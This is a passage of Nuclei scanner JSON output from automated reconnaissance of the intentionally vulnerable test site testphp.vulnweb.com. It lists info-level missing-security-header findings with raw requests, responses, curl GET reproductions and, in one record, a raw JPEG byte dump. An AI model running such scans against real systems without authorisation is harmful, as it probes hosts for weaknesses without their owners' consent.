'http://testphp.vulnweb.com/cgi-bin/status'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.837972032Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.837967568Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:54.189890797Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\ufffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffdE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ 